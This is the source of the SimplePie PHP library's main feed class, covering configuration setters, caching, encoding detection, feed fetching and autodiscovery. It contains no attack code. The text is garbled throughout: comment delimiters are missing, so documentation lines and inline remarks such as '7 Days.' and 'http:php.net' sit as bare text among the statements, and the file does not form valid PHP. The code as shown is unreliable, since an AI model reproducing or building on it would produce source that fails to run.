define('SIMPLEPIE_FILE_SOURCE_FSOCKOPEN', 4);
*
* cURL file source
define('SIMPLEPIE_FILE_SOURCE_CURL', 8);
*
* file_get_contents() file source
define('SIMPLEPIE_FILE_SOURCE_FILE_GET_CONTENTS', 16);
*
* SimplePie
*
* @package SimplePie
* @subpackage API
class SimplePie
{
*
* @var array Raw data
* @access private
public $data = array();
*
* @var mixed Error string
* @access private
public $error;
*
* @var int HTTP status code
* @see SimplePie::status_code()
* @access private
public $status_code;
*
* @var object Instance of SimplePie_Sanitize (or other class)
* @see SimplePie::set_sanitize_class()
* @access private
public $sanitize;
*
* @var string SimplePie Useragent
* @see SimplePie::set_useragent()
* @access private
public $useragent = SIMPLEPIE_USERAGENT;
*
* @var string Feed URL
* @see SimplePie::set_feed_url()
* @access private
public $feed_url;
*
* @var string Original feed URL, or new feed URL iff HTTP 301 Moved Permanently
* @see SimplePie::subscribe_url()
* @access private
public $permanent_url = null;
*
* @var object Instance of SimplePie_File to use as a feed
* @see SimplePie::set_file()
* @access private
public $file;
*
* @var string Raw feed data
* @see SimplePie::set_raw_data()
* @access private
public $raw_data;
*
* @var int Timeout for fetching remote files
* @see SimplePie::set_timeout()
* @access private
public $timeout = 10;
*
* @var array Custom curl options
* @see SimplePie::set_curl_options()
* @access private
public $curl_options = array();
*
* @var bool Forces fsockopen() to be used for remote files instead
* of cURL, even if a new enough version is installed
* @see SimplePie::force_fsockopen()
* @access private
public $force_fsockopen = false;
*
* @var bool Force the given data/URL to be treated as a feed no matter what
* it appears like
* @see SimplePie::force_feed()
* @access private
public $force_feed = false;
*
* @var bool Enable/Disable Caching
* @see SimplePie::enable_cache()
* @access private
public $cache = true;
*
* @var bool Force SimplePie to fallback to expired cache, if enabled,
* when feed is unavailable.
* @see SimplePie::force_cache_fallback()
* @access private
public $force_cache_fallback = false;
*
* @var int Cache duration (in seconds)
* @see SimplePie::set_cache_duration()
* @access private
public $cache_duration = 3600;
*
* @var int Auto-discovery cache duration (in seconds)
* @see SimplePie::set_autodiscovery_cache_duration()
* @access private
public $autodiscovery_cache_duration = 604800; 7 Days.
*
* @var string Cache location (relative to executing script)
* @see SimplePie::set_cache_location()
* @access private
public $cache_location = './cache';
*
* @var string Function that creates the cache filename
* @see SimplePie::set_cache_name_function()
* @access private
public $cache_name_function = 'md5';
*
* @var bool Reorder feed by date descending
* @see SimplePie::enable_order_by_date()
* @access private
public $order_by_date = true;
*
* @var mixed Force input encoding to be set to the follow value
* (false, or anything type-cast to false, disables this feature)
* @see SimplePie::set_input_encoding()
* @access private
public $input_encoding = false;
*
* @var int Feed Autodiscovery Level
* @see SimplePie::set_autodiscovery_level()
* @access private
public $autodiscovery = SIMPLEPIE_LOCATOR_ALL;
*
* Class registry object
*
* @var SimplePie_Registry
public $registry;
*
* @var int Maximum number of feeds to check with autodiscovery
* @see SimplePie::set_max_checked_feeds()
* @access private
public $max_checked_feeds = 10;
*
* @var array All the feeds found during the autodiscovery process
* @see SimplePie::get_all_discovered_feeds()
* @access private
public $all_discovered_feeds = array();
*
* @var string Web-accessible path to the handler_image.php file.
* @see SimplePie::set_image_handler()
* @access private
public $image_handler = '';
*
* @var array Stores the URLs when multiple feeds are being initialized.
* @see SimplePie::set_feed_url()
* @access private
public $multifeed_url = array();
*
* @var array Stores SimplePie objects when multiple feeds initialized.
* @access private
public $multifeed_objects = array();
*
* @var array Stores the get_object_vars() array for use with multifeeds.
* @see SimplePie::set_feed_url()
* @access private
public $config_settings = null;
*
* @var integer Stores the number of items to return per-feed with multifeeds.
* @see SimplePie::set_item_limit()
* @access private
public $item_limit = 0;
*
* @var bool Stores if last-modified and/or etag headers were sent with the
* request when checking a feed.
public $check_modified = false;
*
* @var array Stores the default attributes to be stripped by strip_attributes().
* @see SimplePie::strip_attributes()
* @access private
public $strip_attributes = array('bgsound', 'class', 'expr', 'id', 'style', 'onclick', 'onerror', 'onfinish', 'onmouseover', 'onmouseout', 'onfocus', 'onblur', 'lowsrc', 'dynsrc');
*
* @var array Stores the default attributes to add to different tags by add_attributes().
* @see SimplePie::add_attributes()
* @access private
public $add_attributes = array('audio' => array('preload' => 'none'), 'iframe' => array('sandbox' => 'allow-scripts allow-same-origin'), 'video' => array('preload' => 'none'));
*
* @var array Stores the default tags to be stripped by strip_htmltags().
* @see SimplePie::strip_htmltags()
* @access private
public $strip_htmltags = array('base', 'blink', 'body', 'doctype', 'embed', 'font', 'form', 'frame', 'frameset', 'html', 'iframe', 'input', 'marquee', 'meta', 'noscript', 'object', 'param', 'script', 'style');
*
* @var bool Should we throw exceptions, or use the old-style error property?
* @access private
public $enable_exceptions = false;
*
* The SimplePie class contains feed level data and options
*
* To use SimplePie, create the SimplePie object with no parameters. You can
* then set configuration options using the provided methods. After setting
* them, you must initialise the feed using $feed->init(). At that point the
* object's methods and properties will be available to you.
*
* Previously, it was possible to pass in the feed URL along with cache
* options directly into the constructor. This has been removed as of 1.3 as
* it caused a lot of confusion.
*
* @since 1.0 Preview Release
public function __construct()
{
if (version_compare(PHP_VERSION, '5.6', '<'))
{
trigger_error('Please upgrade to PHP 5.6 or newer.');
die();
}
Other objects, instances created here so we can set options on them
$this->sanitize = new SimplePie_Sanitize();
$this->registry = new SimplePie_Registry();
if (func_num_args() > 0)
{
$level = defined('E_USER_DEPRECATED') ? E_USER_DEPRECATED : E_USER_WARNING;
trigger_error('Passing parameters to the constructor is no longer supported. Please use set_feed_url(), set_cache_location(), and set_cache_duration() directly.', $level);
$args = func_get_args();
switch (count($args)) {
case 3:
$this->set_cache_duration($args[2]);
case 2:
$this->set_cache_location($args[1]);
case 1:
$this->set_feed_url($args[0]);
$this->init();
}
}
}
*
* Used for converting object to a string
public function __toString()
{
return md5(serialize($this->data));
}
*
* Remove items that link back to this before destroying this object
public function __destruct()
{
if (!gc_enabled())
{
if (!empty($this->data['items']))
{
foreach ($this->data['items'] as $item)
{
$item->__destruct();
}
unset($item, $this->data['items']);
}
if (!empty($this->data['ordered_items']))
{
foreach ($this->data['ordered_items'] as $item)
{
$item->__destruct();
}
unset($item, $this->data['ordered_items']);
}
}
}
*
* Force the given data/URL to be treated as a feed
*
* This tells SimplePie to ignore the content-type provided by the server.
* Be careful when using this option, as it will also disable autodiscovery.
*
* @since 1.1
* @param bool $enable Force the given data/URL to be treated as a feed
public function force_feed($enable = false)
{
$this->force_feed = (bool) $enable;
}
*
* Set the URL of the feed you want to parse
*
* This allows you to enter the URL of the feed you want to parse, or the
* website you want to try to use auto-discovery on. This takes priority
* over any set raw data.
*
* You can set multiple feeds to mash together by passing an array instead
* of a string for the $url. Remember that with each additional feed comes
* additional processing and resources.
*
* @since 1.0 Preview Release
* @see set_raw_data()
* @param string|array $url This is the URL (or array of URLs) that you want to parse.
public function set_feed_url($url)
{
$this->multifeed_url = array();
if (is_array($url))
{
foreach ($url as $value)
{
$this->multifeed_url[] = $this->registry->call('Misc', 'fix_protocol', array($value, 1));
}
}
else
{
$this->feed_url = $this->registry->call('Misc', 'fix_protocol', array($url, 1));
$this->permanent_url = $this->feed_url;
}
}
*
* Set an instance of {@see SimplePie_File} to use as a feed
*
* @param SimplePie_File &$file
* @return bool True on success, false on failure
public function set_file(&$file)
{
if ($file instanceof SimplePie_File)
{
$this->feed_url = $file->url;
$this->permanent_url = $this->feed_url;
$this->file =& $file;
return true;
}
return false;
}
*
* Set the raw XML data to parse
*
* Allows you to use a string of RSS/Atom data instead of a remote feed.
*
* If you have a feed available as a string in PHP, you can tell SimplePie
* to parse that data string instead of a remote feed. Any set feed URL
* takes precedence.
*
* @since 1.0 Beta 3
* @param string $data RSS or Atom data as a string.
* @see set_feed_url()
public function set_raw_data($data)
{
$this->raw_data = $data;
}
*
* Set the default timeout for fetching remote feeds
*
* This allows you to change the maximum time the feed's server to respond
* and send the feed back.
*
* @since 1.0 Beta 3
* @param int $timeout The maximum number of seconds to spend waiting to retrieve a feed.
public function set_timeout($timeout = 10)
{
$this->timeout = (int) $timeout;
}
*
* Set custom curl options
*
* This allows you to change default curl options
*
* @since 1.0 Beta 3
* @param array $curl_options Curl options to add to default settings
public function set_curl_options(array $curl_options = array())
{
$this->curl_options = $curl_options;
}
*
* Force SimplePie to use fsockopen() instead of cURL
*
* @since 1.0 Beta 3
* @param bool $enable Force fsockopen() to be used
public function force_fsockopen($enable = false)
{
$this->force_fsockopen = (bool) $enable;
}
*
* Enable/disable caching in SimplePie.
*
* This option allows you to disable caching all-together in SimplePie.
* However, disabling the cache can lead to longer load times.
*
* @since 1.0 Preview Release
* @param bool $enable Enable caching
public function enable_cache($enable = true)
{
$this->cache = (bool) $enable;
}
*
* SimplePie to continue to fall back to expired cache, if enabled, when
* feed is unavailable.
*
* This tells SimplePie to ignore any file errors and fall back to cache
* instead. This only works if caching is enabled and cached content
* still exists.
* @param bool $enable Force use of cache on fail.
public function force_cache_fallback($enable = false)
{
$this->force_cache_fallback= (bool) $enable;
}
*
* Set the length of time (in seconds) that the contents of a feed will be
* cached
*
* @param int $seconds The feed content cache duration
public function set_cache_duration($seconds = 3600)
{
$this->cache_duration = (int) $seconds;
}
*
* Set the length of time (in seconds) that the autodiscovered feed URL will
* be cached
*
* @param int $seconds The autodiscovered feed URL cache duration.
public function set_autodiscovery_cache_duration($seconds = 604800)
{
$this->autodiscovery_cache_duration = (int) $seconds;
}
*
* Set the file system location where the cached files should be stored
*
* @param string $location The file system location.
public function set_cache_location($location = './cache')
{
$this->cache_location = (string) $location;
}
*
* Return the filename (i.e. hash, without path and without extension) of the file to cache a given URL.
* @param string $url The URL of the feed to be cached.
* @return string A filename (i.e. hash, without path and without extension).
public function get_cache_filename($url)
{
Append custom parameters to the URL to avoid cache pollution in case of multiple calls with different parameters.
$url .= $this->force_feed ? '#force_feed' : '';
$options = array();
if ($this->timeout != 10)
{
$options[CURLOPT_TIMEOUT] = $this->timeout;
}
if ($this->useragent !== SIMPLEPIE_USERAGENT)
{
$options[CURLOPT_USERAGENT] = $this->useragent;
}
if (!empty($this->curl_options))
{
foreach ($this->curl_options as $k => $v)
{
$options[$k] = $v;
}
}
if (!empty($options))
{
ksort($options);
$url .= '#' . urlencode(var_export($options, true));
}
return call_user_func($this->cache_name_function, $url);
}
*
* Set whether feed items should be sorted into reverse chronological order
*
* @param bool $enable Sort as reverse chronological order.
public function enable_order_by_date($enable = true)
{
$this->order_by_date = (bool) $enable;
}
*
* Set the character encoding used to parse the feed
*
* This overrides the encoding reported by the feed, however it will fall
* back to the normal encoding detection if the override fails
*
* @param string $encoding Character encoding
public function set_input_encoding($encoding = false)
{
if ($encoding)
{
$this->input_encoding = (string) $encoding;
}
else
{
$this->input_encoding = false;
}
}
*
* Set how much feed autodiscovery to do
*
* @see SIMPLEPIE_LOCATOR_NONE
* @see SIMPLEPIE_LOCATOR_AUTODISCOVERY
* @see SIMPLEPIE_LOCATOR_LOCAL_EXTENSION
* @see SIMPLEPIE_LOCATOR_LOCAL_BODY
* @see SIMPLEPIE_LOCATOR_REMOTE_EXTENSION
* @see SIMPLEPIE_LOCATOR_REMOTE_BODY
* @see SIMPLEPIE_LOCATOR_ALL
* @param int $level Feed Autodiscovery Level (level can be a combination of the above constants, see bitwise OR operator)
public function set_autodiscovery_level($level = SIMPLEPIE_LOCATOR_ALL)
{
$this->autodiscovery = (int) $level;
}
*
* Get the class registry
*
* Use this to override SimplePie's default classes
* @see SimplePie_Registry
* @return SimplePie_Registry
public function &get_registry()
{
return $this->registry;
}
*#@+
* Useful when you are overloading or extending SimplePie's default classes.
*
* @deprecated Use {@see get_registry()} instead
* @link http:php.net/manual/en/language.oop5.basic.php#language.oop5.basic.extends PHP5 extends documentation
* @param string $class Name of custom class
* @return boolean True on success, false otherwise
*
* Set which class SimplePie uses for caching
public function set_cache_class($class = 'SimplePie_Cache')
{
return $this->registry->register('Cache', $class, true);
}
*
* Set which class SimplePie uses for auto-discovery
public function set_locator_class($class = 'SimplePie_Locator')
{
return $this->registry->register('Locator', $class, true);
}
*
* Set which class SimplePie uses for XML parsing
public function set_parser_class($class = 'SimplePie_Parser')
{
return $this->registry->register('Parser', $class, true);
}
*
* Set which class SimplePie uses for remote file fetching
public function set_file_class($class = 'SimplePie_File')
{
return $this->registry->register('File', $class, true);
}
*
* Set which class SimplePie uses for data sanitization
public function set_sanitize_class($class = 'SimplePie_Sanitize')
{
return $this->registry->register('Sanitize', $class, true);
}
*
* Set which class SimplePie uses for handling feed items
public function set_item_class($class = 'SimplePie_Item')
{
return $this->registry->register('Item', $class, true);
}
*
* Set which class SimplePie uses for handling author data
public function set_author_class($class = 'SimplePie_Author')
{
return $this->registry->register('Author', $class, true);
}
*
* Set which class SimplePie uses for handling category data
public function set_category_class($class = 'SimplePie_Category')
{
return $this->registry->register('Category', $class, true);
}
*
* Set which class SimplePie uses for feed enclosures
public function set_enclosure_class($class = 'SimplePie_Enclosure')
{
return $this->registry->register('Enclosure', $class, true);
}
*
* Set which class SimplePie uses for `<media:text>` captions
public function set_caption_class($class = 'SimplePie_Caption')
{
return $this->registry->register('Caption', $class, true);
}
*
* Set which class SimplePie uses for `<media:copyright>`
public function set_copyright_class($class = 'SimplePie_Copyright')
{
return $this->registry->register('Copyright', $class, true);
}
*
* Set which class SimplePie uses for `<media:credit>`
public function set_credit_class($class = 'SimplePie_Credit')
{
return $this->registry->register('Credit', $class, true);
}
*
* Set which class SimplePie uses for `<media:rating>`
public function set_rating_class($class = 'SimplePie_Rating')
{
return $this->registry->register('Rating', $class, true);
}
*
* Set which class SimplePie uses for `<media:restriction>`
public function set_restriction_class($class = 'SimplePie_Restriction')
{
return $this->registry->register('Restriction', $class, true);
}
*
* Set which class SimplePie uses for content-type sniffing
public function set_content_type_sniffer_class($class = 'SimplePie_Content_Type_Sniffer')
{
return $this->registry->register('Content_Type_Sniffer', $class, true);
}
*
* Set which class SimplePie uses item sources
public function set_source_class($class = 'SimplePie_Source')
{
return $this->registry->register('Source', $class, true);
}
*#@-
*
* Set the user agent string
*
* @param string $ua New user agent string.
public function set_useragent($ua = SIMPLEPIE_USERAGENT)
{
$this->useragent = (string) $ua;
}
*
* Set callback function to create cache filename with
*
* @param mixed $function Callback function
public function set_cache_name_function($function = 'md5')
{
if (is_callable($function))
{
$this->cache_name_function = $function;
}
}
*
* Set options to make SP as fast as possible
*
* Forgoes a substantial amount of data sanitization in favor of speed. This
* turns SimplePie into a dumb parser of feeds.
*
* @param bool $set Whether to set them or not
public function set_stupidly_fast($set = false)
{
if ($set)
{
$this->enable_order_by_date(false);
$this->remove_div(false);
$this->strip_comments(false);
$this->strip_htmltags(false);
$this->strip_attributes(false);
$this->add_attributes(false);
$this->set_image_handler(false);
$this->set_https_domains(array());
}
}
*
* Set maximum number of feeds to check with autodiscovery
*
* @param int $max Maximum number of feeds to check
public function set_max_checked_feeds($max = 10)
{
$this->max_checked_feeds = (int) $max;
}
public function remove_div($enable = true)
{
$this->sanitize->remove_div($enable);
}
public function strip_htmltags($tags = '', $encode = null)
{
if ($tags === '')
{
$tags = $this->strip_htmltags;
}
$this->sanitize->strip_htmltags($tags);
if ($encode !== null)
{
$this->sanitize->encode_instead_of_strip($tags);
}
}
public function encode_instead_of_strip($enable = true)
{
$this->sanitize->encode_instead_of_strip($enable);
}
public function strip_attributes($attribs = '')
{
if ($attribs === '')
{
$attribs = $this->strip_attributes;
}
$this->sanitize->strip_attributes($attribs);
}
public function add_attributes($attribs = '')
{
if ($attribs === '')
{
$attribs = $this->add_attributes;
}
$this->sanitize->add_attributes($attribs);
}
*
* Set the output encoding
*
* Allows you to override SimplePie's output to match that of your webpage.
* This is useful for times when your webpages are not being served as
* UTF-8. This setting will be obeyed by {@see handle_content_type()}, and
* is similar to {@see set_input_encoding()}.
*
* It should be noted, however, that not all character encodings can support
* all characters. If your page is being served as ISO-8859-1 and you try
* to display a Japanese feed, you'll likely see garbled characters.
* Because of this, it is highly recommended to ensure that your webpages
* are served as UTF-8.
*
* The number of supported character encodings depends on whether your web
* host supports {@link http:php.net/mbstring mbstring},
* {@link http:php.net/iconv iconv}, or both. See
* {@link http:simplepie.org/wiki/faq/Supported_Character_Encodings} for
* more information.
*
* @param string $encoding
public function set_output_encoding($encoding = 'UTF-8')
{
$this->sanitize->set_output_encoding($encoding);
}
public function strip_comments($strip = false)
{
$this->sanitize->strip_comments($strip);
}
*
* Set element/attribute key/value pairs of HTML attributes
* containing URLs that need to be resolved relative to the feed
*
* Defaults to |a|@href, |area|@href, |blockquote|@cite, |del|@cite,
* |form|@action, |img|@longdesc, |img|@src, |input|@src, |ins|@cite,
* |q|@cite
*
* @since 1.0
* @param array|null $element_attribute Element/attribute key/value pairs, null for default
public function set_url_replacements($element_attribute = null)
{
$this->sanitize->set_url_replacements($element_attribute);
}
*
* Set the list of domains for which to force HTTPS.
* @see SimplePie_Sanitize::set_https_domains()
* @param array List of HTTPS domains. Example array('biz', 'example.com', 'example.org', 'www.example.net').
public function set_https_domains($domains = array())
{
if (is_array($domains))
{
$this->sanitize->set_https_domains($domains);
}
}
*
* Set the handler to enable the display of cached images.
*
* @param string $page Web-accessible path to the handler_image.php file.
* @param string $qs The query string that the value should be passed to.
public function set_image_handler($page = false, $qs = 'i')
{
if ($page !== false)
{
$this->sanitize->set_image_handler($page . '?' . $qs . '=');
}
else
{
$this->image_handler = '';
}
}
*
* Set the limit for items returned per-feed with multifeeds
*
* @param integer $limit The maximum number of items to return.
public function set_item_limit($limit = 0)
{
$this->item_limit = (int) $limit;
}
*
* Enable throwing exceptions
*
* @param boolean $enable Should we throw exceptions, or use the old-style error property?
public function enable_exceptions($enable = true)
{
$this->enable_exceptions = $enable;
}
*
* Initialize the feed object
*
* This is what makes everything happen. Period. This is where all of the
* configuration options get processed, feeds are fetched, cached, and
* parsed, and all of that other good stuff.
*
* @return boolean True if successful, false otherwise
public function init()
{
Check absolute bare minimum requirements.
if (!extension_loaded('xml') || !extension_loaded('pcre'))
{
$this->error = 'XML or PCRE extensions not loaded!';
return false;
}
Then check the xml extension is sane (i.e., libxml 2.7.x issue on PHP < 5.2.9 and libxml 2.7.0 to 2.7.2 on any version) if we don't have xmlreader.
elseif (!extension_loaded('xmlreader'))
{
static $xml_is_sane = null;
if ($xml_is_sane === null)
{
$parser_check = xml_parser_create();
xml_parse_into_struct($parser_check, '<foo>&</foo>', $values);
xml_parser_free($parser_check);
$xml_is_sane = isset($values[0]['value']);
}
if (!$xml_is_sane)
{
return false;
}
}
The default sanitize class gets set in the constructor, check if it has
changed.
if ($this->registry->get_class('Sanitize') !== 'SimplePie_Sanitize') {
$this->sanitize = $this->registry->create('Sanitize');
}
if (method_exists($this->sanitize, 'set_registry'))
{
$this->sanitize->set_registry($this->registry);
}
Pass whatever was set with config options over to the sanitizer.
Pass the classes in for legacy support; new classes should use the registry instead
$this->sanitize->pass_cache_data($this->cache, $this->cache_location, $this->cache_name_function, $this->registry->get_class('Cache'));
$this->sanitize->pass_file_data($this->registry->get_class('File'), $this->timeout, $this->useragent, $this->force_fsockopen, $this->curl_options);
if (!empty($this->multifeed_url))
{
$i = 0;
$success = 0;
$this->multifeed_objects = array();
$this->error = array();
foreach ($this->multifeed_url as $url)
{
$this->multifeed_objects[$i] = clone $this;
$this->multifeed_objects[$i]->set_feed_url($url);
$single_success = $this->multifeed_objects[$i]->init();
$success |= $single_success;
if (!$single_success)
{
$this->error[$i] = $this->multifeed_objects[$i]->error();
}
$i++;
}
return (bool) $success;
}
elseif ($this->feed_url === null && $this->raw_data === null)
{
return false;
}
$this->error = null;
$this->data = array();
$this->check_modified = false;
$this->multifeed_objects = array();
$cache = false;
if ($this->feed_url !== null)
{
$parsed_feed_url = $this->registry->call('Misc', 'parse_url', array($this->feed_url));
Decide whether to enable caching
if ($this->cache && $parsed_feed_url['scheme'] !== '')
{
$filename = $this->get_cache_filename($this->feed_url);
$cache = $this->registry->call('Cache', 'get_handler', array($this->cache_location, $filename, 'spc'));
}
Fetch the data via SimplePie_File into $this->raw_data
if (($fetched = $this->fetch_data($cache)) === true)
{
return true;
}
elseif ($fetched === false) {
return false;
}
list($headers, $sniffed) = $fetched;
}
Empty response check
if(empty($this->raw_data)){
$this->error = "A feed could not be found at `$this->feed_url`. Empty body.";
$this->registry->call('Misc', 'error', array($this->error, E_USER_NOTICE, __FILE__, __LINE__));
return false;
}
Set up array of possible encodings
$encodings = array();
First check to see if input has been overridden.
if ($this->input_encoding !== false)
{
$encodings[] = strtoupper($this->input_encoding);
}
$application_types = array('application/xml', 'application/xml-dtd', 'application/xml-external-parsed-entity');
$text_types = array('text/xml', 'text/xml-external-parsed-entity');
RFC 3023 (only applies to sniffed content)
if (isset($sniffed))
{
if (in_array($sniffed, $application_types) || substr($sniffed, 0, 12) === 'application/' && substr($sniffed, -4) === '+xml')
{
if (isset($headers['content-type']) && preg_match('/;\x20?charset=([^;]*)/i', $headers['content-type'], $charset))
{
$encodings[] = strtoupper($charset[1]);
}
$encodings = array_merge($encodings, $this->registry->call('Misc', 'xml_encoding', array($this->raw_data, &$this->registry)));
$encodings[] = 'UTF-8';
}
elseif (in_array($sniffed, $text_types) || substr($sniffed, 0, 5) === 'text/' && substr($sniffed, -4) === '+xml')
{
if (isset($headers['content-type']) && preg_match('/;\x20?charset=([^;]*)/i', $headers['content-type'], $charset))
{
$encodings[] = strtoupper($charset[1]);
}
$encodings[] = 'US-ASCII';
}
Text MIME-type default
elseif (substr($sniffed, 0, 5) === 'text/')
{
$encodings[] = 'UTF-8';
}
}
Fallback to XML 1.0 Appendix F.1/UTF-8/ISO-8859-1
$encodings = array_merge($encodings, $this->registry->call('Misc', 'xml_encoding', array($this->raw_data, &$this->registry)));
$encodings[] = 'UTF-8';
$encodings[] = 'ISO-8859-1';
There's no point in trying an encoding twice
$encodings = array_unique($encodings);
Loop through each possible encoding, till we return something, or run out of possibilities
foreach ($encodings as $encoding)
{
Change the encoding to UTF-8 (as we always use UTF-8 internally)
if ($utf8_data = $this->registry->call('Misc', 'change_encoding', array($this->raw_data, $encoding, 'UTF-8')))
{
Create new parser
$parser = $this->registry->create('Parser');
If it's parsed fine
if ($parser->parse($utf8_data, 'UTF-8', $this->permanent_url))
{
$this->data = $parser->get_data();
if (!($this->get_type() & ~SIMPLEPIE_TYPE_NONE))
{
$this->error = "A feed could not be found at `$this->feed_url`. This does not appear to be a valid RSS or Atom feed.";
$this->registry->call('Misc', 'error', array($this->error, E_USER_NOTICE, __FILE__, __LINE__));
return false;
}
if (isset($headers))
{
$this->data['headers'] = $headers;
}
$this->data['build'] = SIMPLEPIE_BUILD;
Cache the file if caching is enabled
if ($cache && !$cache->save($this))
{
trigger_error("$this->cache_location is not writable. Make sure you've set the correct relative or absolute path, and that the location is server-writable.", E_USER_WARNING);
}
return true;
}
}
}
if (isset($parser))
{
We have an error, just set SimplePie_Misc::error to it and quit
$this->error = $this->feed_url;
$this->error .= sprintf(' is invalid XML, likely due to invalid characters. XML error: %s at line %d, column %d', $parser->get_error_string(), $parser->get_current_line(), $parser->get_current_column());
}
else
{
$this->error = 'The data could not be converted to UTF-8.';
if (!extension_loaded('mbstring') && !extension_loaded('iconv') && !class_exists('\UConverter')) {
$this->error .= ' You MUST have either the iconv, mbstring or intl (PHP 5.5+) extension installed and enabled.';
} else {
$missingExtensions = array();
if (!extension_loaded('iconv')) {
$missingExtensions[] = 'iconv';
}
if (!extension_loaded('mbstring')) {
$missingExtensions[] = 'mbstring';
}
if (!class_exists('\UConverter')) {
$missingExtensions[] = 'intl (PHP 5.5+)';
}
$this->error .= ' Try installing/enabling the ' . implode(' or ', $missingExtensions) . ' extension.';
}
}
$this->registry->call('Misc', 'error', array($this->error, E_USER_NOTICE, __FILE__, __LINE__));
return false;
}
*
* Fetch the data via SimplePie_File
*
* If the data is already cached, attempt to fetch it from there instead
* @param SimplePie_Cache_Base|false $cache Cache handler, or false to not load from the cache
* @return array|true Returns true if the data was loaded from the cache, or an array of HTTP headers and sniffed type
protected function fetch_data(&$cache)
{
If it's enabled, use the cache
if ($cache)
{
Load the Cache
$this->data = $cache->load();
if (!empty($this->data))
{
If the cache is for an outdated build of SimplePie
if (!isset($this->data['build']) || $this->data['build'] !== SIMPLEPIE_BUILD)
{
$cache->unlink();
$this->data = array();
}
If we've hit a collision just rerun it with caching disabled
elseif (isset($this->data['url']) && $this->data['url'] !== $this->feed_url)
{
$cache = false;
$this->data = array();
}
If we've got a non feed_url stored (if the page isn't actually a feed, or is a redirect) use that URL.
elseif (isset($this->data['feed_url']))
{
If the autodiscovery cache is still valid use it.
if ($cache->mtime() + $this->autodiscovery_cache_duration > time())
{
Do not need to do feed autodiscovery yet.
if ($this->data['feed_url'] !== $this->data['url'])
{
$this->set_feed_url($this->data['feed_url']);
return $this->init();
}
$cache->unlink();
$this->data = array();
}
}
Check if the cache has been updated
elseif ($cache->mtime() + $this->cache_duration < time())
{
Want to know if we tried to send last-modified and/or etag headers
when requesting this file. (Note that it's up to the file to
support this, but we don't always send the headers either.)
$this->check_modified = true;
if (isset($this->data['headers']['last-modified']) || isset($this->data['headers']['etag']))
{
$headers = array(
'Accept' => 'application/atom+xml, application/rss+xml, application/rdf+xml;q=0.9, application/xml;q=0.8, text/xml;q=0.8, text/html;q=0.7, unknown/unknown;q=0.1, application/unknown;q=0.1, *;q=0.1',
);
if (isset($this->data['headers']['last-modified']))
{
$headers['if-modified-since'] = $this->data['headers']['last-modified'];
}
if (isset($this->data['headers']['etag']))
{
$headers['if-none-match'] = $this->data['headers']['etag'];
}
$file = $this->registry->create('File', array($this->feed_url, $this->timeout/10, 5, $headers, $this->useragent, $this->force_fsockopen, $this->curl_options));
$this->status_code = $file->status_code;
if ($file->success)
{
if ($file->status_code === 304)
{
Set raw_data to false here too, to signify that the cache
is still valid.
$this->raw_data = false;
$cache->touch();
return true;
}
}
else
{
$this->check_modified = false;
if($this->force_cache_fallback)
{
$cache->touch();
return true;
}
unset($file);
}
}
}
If the cache is still valid, just return true
else
{
$this->raw_data = false;
return true;
}
}
If the cache is empty, delete it
else
{
$cache->unlink();
$this->data = array();
}
}
If we don't already have the file (it'll only exist if we've opened it to check if the cache has been modified), open it.
if (!isset($file))
{
if ($this->file instanceof SimplePie_File && $this->file->url === $this->feed_url)
{
$file =& $this->file;
}
else
{
$headers = array(
'Accept' => 'application/atom+xml, application/rss+xml, application/rdf+xml;q=0.9, application/xml;q=0.8, text/xml;q=0.8, text/html;q=0.7, unknown/unknown;q=0.1, application/unknown;q=0.1, *;q=0.1',
);
$file = $this->registry->create('File', array($this->feed_url, $this->timeout, 5, $headers, $this->useragent, $this->force_fsockopen, $this->curl_options));
}
}
$this->status_code = $file->status_code;
If the file connection has an error, set SimplePie::error to that and quit
if (!$file->success && !($file->method & SIMPLEPIE_FILE_SOURCE_REMOTE === 0 || ($file->status_code === 200 || $file->status_code > 206 && $file->status_code < 300)))
{
$this->error = $file->error;
return !empty($this->data);
}
if (!$this->force_feed)
{
Check if the supplied URL is a feed, if it isn't, look for it.
$locate = $this->registry->create('Locator', array(&$file, $this->timeout, $this->useragent, $this->max_checked_feeds, $this->force_fsockopen, $this->curl_options));
if (!$locate->is_feed($file))
{
$copyStatusCode = $file->status_code;
$copyContentType = $file->headers['content-type'];
try
{
$microformats = false;
if (class_exists('DOMXpath') && function_exists('Mf2\parse')) {
$doc = new DOMDocument();
@$doc->loadHTML($file->body);
$xpath = new DOMXpath($doc);
Check for both h-feed and h-entry, as both a feed with no entries
and a list of entries without an h-feed wrapper are both valid.
$query = '*[contains(concat(" ", @class, " "), " h-feed ") or '.
'contains(concat(" ", @class, " "), " h-entry ")]';
$result = $xpath->query($query);
$microformats = $result->length !== 0;
}
Now also do feed discovery, but if microformats were found don't
overwrite the current value of file.
$discovered = $locate->find($this->autodiscovery,
$this->all_discovered_feeds);
if ($microformats)
{
if ($hub = $locate->get_rel_link('hub'))
{
$self = $locate->get_rel_link('self');
$this->store_links($file, $hub, $self);
}
Push the current file onto all_discovered feeds so the user can
be shown this as one of the options.
if (isset($this->all_discovered_feeds)) {
$this->all_discovered_feeds[] = $file;
}
}
else
{
if ($discovered)
{
$file = $discovered;
}
else
{
We need to unset this so that if SimplePie::set_file() has
been called that object is untouched
unset($file);
$this->error = "A feed could not be found at `$this->feed_url`; the status code is `$copyStatusCode` and content-type is `$copyContentType`";
$this->registry->call('Misc', 'error', array($this->error, E_USER_NOTICE, __FILE__, __LINE__));
return false;
}
}
}
catch (SimplePie_Exception $e)
{
We need to unset this so that if SimplePie::set_file() has been called that object is untouched
unset($file);
This is usually because DOMDocument doesn't exist
$this->error = $e->getMessage();
$this->registry->call('Misc', 'error', array($this->error, E_USER_NOTICE, $e->getFile(), $e->getLine()));
return false;
}
if ($cache)
{
$this->data = array('url' => $this->feed_url, 'feed_url' => $file->url, 'build' => SIMPLEPIE_BUILD);
if (!$cache->save($this))
{
trigger_error("$this->cache_location is not writable. Make sure you've set the correct relative or absolute path, and that the location is server-writable.", E_USER_WARNING);
}
$cache = $this->registry->call('Cache', 'get_handler', array($this->cache_location, call_user_func($this->cache_name_function, $file->url), 'spc'));
}
}
$this->feed_url = $file->url;
$locate = null;
}
$this->raw_data = $file->body;
$this->permanent_url = $file->permanent_url;
$headers = $file->headers;
$sniffer = $this->registry->create('Content_Type_Sniffer', array(&$file));
$sniffed = $sniffer->get_type();
return array($headers, $sniffed);
}
*
* Get the error message for the occurred error
*
* @return string|array Error message, or array of messages for multifeeds
public function error()
{
return $this->error;
}
*
* Get the last HTTP status code
*
* @return int Status code
public function status_code()
{
return $this->status_code;
}
*
* Get the raw XML
*
* This is the same as the old `$feed->enable_xml_dump(true)`, but returns
* the data instead of printing it.
*
* @return string|boolean Raw XML data, false if the cache is used
